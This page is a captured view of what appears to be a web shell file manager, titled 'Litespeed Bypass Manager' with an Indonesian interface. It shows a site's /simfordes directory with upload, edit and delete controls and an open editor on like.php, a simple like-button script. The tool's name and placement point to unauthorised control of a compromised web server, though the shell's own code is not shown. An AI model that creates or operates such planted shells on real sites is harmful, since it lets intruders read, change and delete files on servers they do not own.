Litespeed Bypass Manager
Direktori:
/simfordes
⬆️ Kembali
Buat Folder Baru
Buat Folder
Upload File
Upload
⚠️ Litespeed Uploader
Isi Folder
📁
ViewerJS
Folder
Hapus
📁
assets
Folder
Hapus
📁
css
Folder
Hapus
📁
file
Folder
Hapus
📁
fonts
Folder
Hapus
📁
gambar
Folder
Hapus
📁
images
Folder
Hapus
📁
js
Folder
Hapus
📁
leaflet
Folder
Hapus
📁
librari
Folder
Hapus
📁
vendor
Folder
Hapus
📁
viewerjs-0.5.8
Folder
Hapus
📄 ArtikelDetail.php
Edit
Hapus
📄 artikel.php
Edit
Hapus
📄 detailsig.php
Edit
Hapus
📄 error_log
Edit
Hapus
📄 fetchLike.php
Edit
Hapus
📄 fetchLikeInput.php
Edit
Hapus
📄 getMap.php
Edit
Hapus
📄 index.php
Edit
Hapus
📄 legal.php
Edit
Hapus
📄 legallengkap.php
Edit
Hapus
📄 lembaga.php
Edit
Hapus
📄 lihatperaturan.php
Edit
Hapus
📄 like.php
Edit
Hapus
📄 profil.php
Edit
Hapus
📄 sig.php
Edit
Hapus
📄 statistik.php
Edit
Hapus
Edit File: like.php
<script type="text/javascript" src="js/jquery.min.js"></script> <div class="block" id="like"> <a href="#" class="post-like"> <i class="fa fa-thumbs-up"></i> <p class="count"></p></a> </div> <?php $ip = $_SERVER['REMOTE_ADDR']; ?> <script> $.noConflict(); $('#like').ready(function() { function load_unseen_notification(view = '<?php echo $id_informasi; ?>') { $.ajax({ url: "fetchLike.php", method: "POST", data: { view: view }, dataType: "json", success: function(data) { if (data.unseen_notification > 0) { $('.count').html(data.unseen_notification); } else { $('.count').html(data.unseen_notification); } } }); } load_unseen_notification(); setInterval(function() { load_unseen_notification();; }, 1000); }); $('#like').on('click', '.post-like', function() { $('.count').html(''); $.ajax({ url: "fetchLikeInput.php", method: "POST", data: { view: <?php echo $id_informasi; ?> }, }) ; }); </script>
Simpan
Catatan: Mengedit file biner tidak disarankan.